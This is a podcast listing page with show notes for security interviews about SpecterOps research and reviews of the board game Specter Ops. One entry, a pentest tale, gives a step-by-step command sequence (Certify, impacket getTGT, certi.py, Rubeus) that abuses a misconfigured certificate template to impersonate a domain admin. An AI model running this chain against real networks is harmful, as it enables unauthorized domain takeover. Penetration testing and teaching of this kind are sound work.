This week, in our first segment we are joined by Andy Robbins, the Product Architect of BloodHound Enterprise at SpecterOps! Andy will explain the origin story of BloodHound, as well as where the project is today and where it's going in the future! Then, in the Security News for this week: Raspberry Pi Pico W Adds Wireless, Apple expands commitment to protect users from mercenary spyware, UK health authorities slammed for WhatsApp use in pandemic, Three UEFI Firmware flaws found in tens of Lenovo Notebook models, & a Hack Allows Drone Takeover Via ‘ExpressLRS' Protocol!   Segment Resources: https://github.com/BloodHoundAD/BloodHound https://medium.com/p/82667d17187a   Visit https://www.securityweekly.com/psw for all the latest episodes!   Visit https://securityweekly.com/acm to sign up for a demo or buy our AI Hunter! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly   Show Notes: https://securityweekly.com/psw747

Detection: Challenging Paradigms
S2 - Episode 9: Robby Winchester

Detection: Challenging Paradigms

Play Episode Listen Later Feb 14, 2022 69:28


In Episode 9, Robby Winchester of SpecterOps stops by to talk on Jared's favorite topic - Detectionomics (trademark pending). This was our second in-person episode and was a blast to make, we hope you enjoy!

7 Minute Security
7MS #501: Tales of Pentest Pwnage - Part 31

7 Minute Security

Play Episode Listen Later Dec 29, 2021 44:09


Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows:
- Grab Certi
- Grab Certify
- Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them.
In my case, the results I got from Certify showed:
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands:
sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS'
export KRB5CCNAME=myuser.cache
sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME
From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do:
rubeus.exe purge
rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER
And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!

Going Analog Podcast
78: Board Game Arena pros/cons, playing "blind," and more (guest: Emerson Matsuuchi)

Going Analog Podcast

Play Episode Listen Later Nov 18, 2021 70:19


We love playing games in-person! But sometimes you want to scratch that board-gaming itch for a few minutes in the middle of the workweek. Or during a "break." Or, well, all the damn time. Playing asynchronously on Board Game Arena lets you do just that...a lot. Just don't tell our bosses. Our BGA play pals Emerson Matsuuchi (designer of the Century series, Specter Ops, Reef, and the upcoming Foundations of Rome) and Jess Yi (frequent Going Analog contributor) join Christina and Shoe to gab about Board Game Arena vs. Tabletop Simulator, which games work best on the platform, and whether we can learn how to play (and enjoy) an entire game online without ever reading the rules. Our topics this episode: Jess (contributor): Board Game Arena vs. Tabletop Simulator Christina (host): Which games are better on Board Game Arena, and which are worse? Emerson (guest): Our experiences playing "blind" on Board Game Arena

The CyberWire
You can add new features, just secure the old stuff first. [Research Saturday]

The CyberWire

Play Episode Listen Later Aug 14, 2021 32:14


Guests Will Schroeder and Lee Christensen from SpecterOps join Dave to share the research they recently presented at Black Hat USA on the security of Microsoft's Active Directory Certificate Services. Their abstract: Microsoft's Active Directory Public Key Infrastructure (PKI) implementation, known as Active Directory Certificate Services (AD CS), has largely flown under the radar of both the offensive and defensive communities. AD CS is widely deployed, and provides attackers opportunities for credential theft, machine persistence, domain escalation, and subtle domain persistence. We present relevant background on certificates in Active Directory, detail the abuse of AD CS through certificate theft and active malicious enrollments for user and machine persistence, discuss a set of common misconfigurations that can result in domain escalation, and explain a method for stealing a Certificate Authority's private key in order to forge new user/machine “golden” certificates. By bringing light to the security implications of AD CS, we hope to raise awareness for both attackers and defenders alike of the security issues surrounding this complex, widely deployed, and often misunderstood system. The blog post and white paper can be found here: Certified Pre-Owned blog post Certified Pre-Owned white paper

Research Saturday
You can add new features, just secure the old stuff first.

Research Saturday

Play Episode Listen Later Aug 14, 2021 32:14


Guests Will Schroeder and Lee Christensen from SpecterOps join Dave to share the research they recently presented at Black Hat USA on the security of Microsoft's Active Directory Certificate Services. Their abstract: Microsoft's Active Directory Public Key Infrastructure (PKI) implementation, known as Active Directory Certificate Services (AD CS), has largely flown under the radar of both the offensive and defensive communities. AD CS is widely deployed, and provides attackers opportunities for credential theft, machine persistence, domain escalation, and subtle domain persistence. We present relevant background on certificates in Active Directory, detail the abuse of AD CS through certificate theft and active malicious enrollments for user and machine persistence, discuss a set of common misconfigurations that can result in domain escalation, and explain a method for stealing a Certificate Authority's private key in order to forge new user/machine “golden” certificates. By bringing light to the security implications of AD CS, we hope to raise awareness for both attackers and defenders alike of the security issues surrounding this complex, widely deployed, and often misunderstood system. The blog post and white paper can be found here: Certified Pre-Owned blog post Certified Pre-Owned white paper

The Threatpost Podcast
Podcast: Why Securing Microsoft Active Directory Is Such a Nightmare

The Threatpost Podcast

Play Episode Listen Later Jul 28, 2021 33:20


SpecterOps researchers Lee Christensen and Will Schroeder discuss their work, to be presented at Black Hat, on how AD “misconfiguration debt” lays out a dizzying array of attack paths such as the one in the PetitPotam exploit for which Microsoft  rushed out a fix.

The Social-Engineer Podcast
Ep. 146 - Demand Transparency with a blue shirt with Jason Frank

The Social-Engineer Podcast

Play Episode Listen Later May 17, 2021 41:07


In this episode, Chris Hadnagy and Ryan MacDougall are joined by Jason Frank. Jason has an extensive background in helping both government and Fortune 100 organizations, and has served as a course instructor for the Black Hat security conference. Jason is now currently the COO at SpecterOps, where he is accountable for execution of the company. He oversees the Adversary Simulation and Detection delivery capabilities, where he helps clients to understand, detect, and respond to adversaries. May 17, 2021
00:00 – Intro: Social-Engineer.com, Social-Engineer.org, InnocentLivesFoundation.org, Human Hacking Book, Vishing as a Service (VaaS), Phishing as a Service (PHaaS), HumanHackingBook.com, Slack Channel, @HumanHacker on Twitter, CLUTCH
03:05 – Podcast Guest Jason Frank Intro
03:22 – Jason at BlackHat
03:30 – SpecterOps
04:34 – How Jason got to where he is
08:50 – Curiosity and motivation born from failing at a CTF
09:50 – Adversary Simulation – why is Jason using this phrase?
12:32 – Where are we in the current security culture?
16:11 – How to get attention of stakeholders, what concepts do you put in play?
18:03 – Reactive vs. Proactive
21:56 – How can corporations prepare for and mitigate attacks?
23:39 – What are the business repercussions of not letting machines talk to each other, and only the server?
25:45 – What are the more recent attacks you've seen coming up that people should be looking for?
28:14 – Knowledge bombs – terminology that people can look up to recognize “low hanging fruit” they may be missing – Bloodhound
30:00 – Cycles where certain things can be exploited such as ActiveDirectory
30:50 – What other things do companies need to be watching for
32:14 – PowerShell
33:44 – What are some action steps that corporations should start taking right now?
34:51 – Colleagues Jason respects most in the industry: Andrew Morris founder of GreyNoise; Dane Stuckey from Palantir; Jason Hill from DHS CISA; Bryan Beyer and Keith McCammon from Red Canary
36:50 – Jason's Book Recommendations: Creativity Inc.; Principles: Life and Work; Get A Grip
38:31 – Wrap-Up: @jasonjfrank on Twitter; Jason J Frank on LinkedIn; @joemontmania on Twitter (Ryan MacDougall); @HumanHacker on Twitter (Chris Hadnagy); @InnocentOrg on Twitter (Innocent Lives Foundation)

Board Game Crawler
EP10 Frost Punk, Specter Ops, & The Art Of Teaching Board Games.

Board Game Crawler

Play Episode Listen Later May 11, 2021 80:23


Today we talk about another video game IP that's found its way into the table top world, an awesome hidden movement game, and we share our tips and tricks for being the best board game teacher you can be.

The Innkeeper's Table
49 - Game Highlight: Specter Ops

The Innkeeper's Table

Play Episode Listen Later Apr 16, 2021 18:45


Dylan and Bill explore the unseen corners of the hidden movement game, Specter Ops.

Not Scholars
Episode 00 - Murder Bread (Specter Ops)

Not Scholars

Play Episode Listen Later Nov 7, 2020 27:46


Our latest episode kept having the audio cut in and out.... It was unusable. So you get our unreleased pilot instead! We recorded this a long time ago, so I have no idea what's in the episode... It's a surprise! It's really a win-win situation when you think about it... You win twice! p.s. Jake is not in this episode, so I guess you lose as well.

MFGCast
Under the Sea

MFGCast

Play Episode Listen Later Sep 24, 2018


Emerson Matsuuchi has had some hits with Century: Spice Road, Crossfire and Specter Ops. But what about an abstract game about underwater coral placement? Join the MFGCast as we talk about Reef by Plan B Games. http://mfgcast.com/wp-content/uploads/2018/09/Episode_202_Final.mp3

Board Game Design Lab
How to Make a Great Hidden Movement Game with Emerson Matsuuchi

Board Game Design Lab

Play Episode Listen Later Feb 15, 2017 36:26


Emerson Matsuuchi, designer of Specter Ops, goes into all the ins and outs of putting together a hidden movement game. There are very few hidden movement games out there right now which means there's still a ton to be explored. Emerson discusses the challenges he faced and his insights on the topic. The post How to Make a Great Hidden Movement Game with Emerson Matsuuchi appeared first on Board Game Design Lab.

The Die Is Podcast
Episode 99a: Specter Ops and The Castles of Burgundy card game

The Die Is Podcast

Play Episode Listen Later Dec 1, 2016 67:13


In this episode, Brandon and Chris got some bonus game time in over the Thanksgiving, which in no way makes up for the two day late release... but we talk about Samurai Spirit, Guild of Dungeoneering, Dishonored 2, Slamwich, Linko! and our games of the week, too. Samurai Spirit - 02:20 Guild of Dungeoneering - 06:13 Star Wars: Guild of Heroes has ships. - 09:39 Brandon's GotW: Specter Ops - 14:43 Foam Core Construction - 27:24 Further Dishonored 2 - 29:00 Slamwich and Junk Art - 33:31 Linko! - 39:42 Chris' GotW: The Castles of Burgundy card game - 42:49 Closing and Contact Info - 65:48

Dukes of Dice
Dukes of Dice - Ep. 103 - Hide and Go Reap

Dukes of Dice

Play Episode Listen Later Aug 1, 2016 100:22


This episode the Dukes ...  ... Discuss recent plays of Space Alert, Via Nebula Box of Rocks, Paris Connection and they play Box of Rocks live on the podcast (3:42); ... Discuss new info about the Scythe expansion straight from Jaime on the latest Dukes' Live Q&A, the new dice and card collectible game from Fantasy Flight Games Star Wars: Destiny, and a new Kickstarter for a real time mech fighting game Armored Core (18:46); ... Review Stonemaier Games' Scythe (29:59);  ... Look back at their review of Specter Ops in their Dukes' Double-Take (1:20:54); and ... Discuss some of their love-hate relationships with games (1:28:45).   Click here to answer the Dukes' survey for a chance to win a $50 gift card to Coolstuffinc.com! Deadline EXTENDED to Midnight Mountain time on August 12, 2016.   Please be sure to support the Dukes on their Patreon campaign page! Twitter: @dukesofdice Facebook: /dukesofdice Dukes of Dice YouTube ChannelSubscribe on iTunes   Visit our sponsor Meeple Realty.    

Dukes of Dice
Dukes of Dice - Ep. 51 - SpecterEx

Dukes of Dice

Play Episode Listen Later Aug 3, 2015 85:49


Today the Dukes...
... Discuss recent plays including Baseball Highlights 2045, Viceroy, Mysterium, Fury of Dracula (2nd Ed.), Penny Press, Bohnanza and Arcadia Quest (04:08);
... Talk the latest board game news including the Fantasy Flight news from GenCon about Warhammer Quest: The Adventure Card Game and Runebound (3rd Ed.), F2Z acquiring Plaid Hat Games, Tabletop Season 4 announced, and the Kickstarter for Laboratory's 100 Swords (22:25);
... Review Plaid Hat Games' and Nazca Games' Specter Ops (35:56); and
... Discuss the different types of board game expansions (1:05:38).
Please be sure to support the Dukes on their Patreon campaign page! Don't forget to give us your hearts on Board Game Links!
Twitter: @dukesofdice
Facebook: /dukesofdice
Dukes of Dice YouTube Channel

Dukes of Dice
Dukes of Dice - Ep. 48 - Demi-Spiel

Dukes of Dice

Play Episode Listen Later Jul 13, 2015 80:31


Today the Dukes...
... Discuss recent plays including Specter Ops, Jaipur, New Salem, Dead Drop, Evolution: Flight and Marco Polo (1:52);
... Talk the latest board game news, including the Attack on Titan game from Cryptozoic, the new expansion for the Sentinels of the Multiverse App and the Kickstarter for JurassAttack! from Green Couch Games. (27:24);
... Review Space Cowboys' and Asmodee's Elysium (Rules overview - 33:16; Review - 36:33); and
... Discuss the recent winners of the Spiel Des Jahres (1:02:13).
Please be sure to support the Dukes on their Patreon campaign page! Don't forget to give us your hearts on Board Game Links!
Twitter: @dukesofdice
Facebook: /dukesofdice
Dukes of Dice YouTube Channel

Rahdo Talks Through
RTT Episode 2

Rahdo Talks Through

Play Episode Listen Later Jul 5, 2015 157:45


Too many new games! Questions (plus) Answers! Engine building games broken down! SHOW NOTES: •••What Have We've Been Playing? (00:01:40)►►► Elysium, Voyages of Marco Polo, Specter Ops, Cthulhu Realms, Flip City, Dungeon of Fortune, Bottlecap Vikings •••Games of Interest (01:09:55)►►► Legends of Andor: Chada & Thorn, The Loser's Club, Unnamed Castles of Burgundy Sequel, Council of Four, Rattle Battle Grab the Loot, Dice City, Shadowrift 2nd Edition, Legacy Time Surge, Shadowrun Crossfire High Caliber Ops, Villages of Valeria, Minerva, Shakespeare, Apollo XIII, Octo Dice •••Q&A (01:40:02)►►► How often do we play games? Do we ever play "mean" games? Do we miss playing with more than 2? Am I going to design my own game? Would I take a prototype to a publisher or Kickstarter? How does the boardgame industry compare to the videogame industry? How did you relocate from the US to Malta? More questions? Send your fragen to questions@rahdo.com! •••Top 10 Revisited (02:16:35)►►► Engine building games! Original top10 video: https://www.youtube.com/watch?v=KAKtwJa9J4s •••Help Rahdo run @ https://patreon.com/rahdo •••Send your questions to questions@rahdo.com

Boards Alive Podcast
Episode 30 - Interview with Plaid Hat Games Colby Dauch and Isaac Vega, and Nazca Games Emerson Matsuuchi

Boards Alive Podcast

Play Episode Listen Later Jul 5, 2015 119:31


In our thirtieth episode, Quinten and Aaron are joined by Colby Dauch and Isaac Vega of Plaid Hat Games and Emerson Matsuuchi of Nazca Games. We all talk about the games we have been playing lately, including the upcoming Ashes from Plaid Hat Games. We don't do a formal review this episode, but interview Colby, Emerson, & Isaac, asking them about their publishing background, their creation of Specter Ops and Ashes, and we had a ton of listener questions. Then we quizzed them on their knowledge of Canada in our trivia game, Know Your Neighbour to the North. This episode is sponsored by Tasty Minstrel Games & Secret Base Games

Boards Alive Podcast
Episode 29 - Specter Ops

Boards Alive Podcast

Play Episode Listen Later Jun 15, 2015 100:44


In our twenty-ninth episode, we talk about the games we have been playing lately. We also have another Dawn of the FunDead segment, with Monstrous from Secret Base Games. We also review the hidden movement game Specter Ops, and we have the second session of Boards Alive Plays: Dungeons & Dragons 5th Edition.  This episode is sponsored by Tasty Minstrel Games & Grok Gaming Mats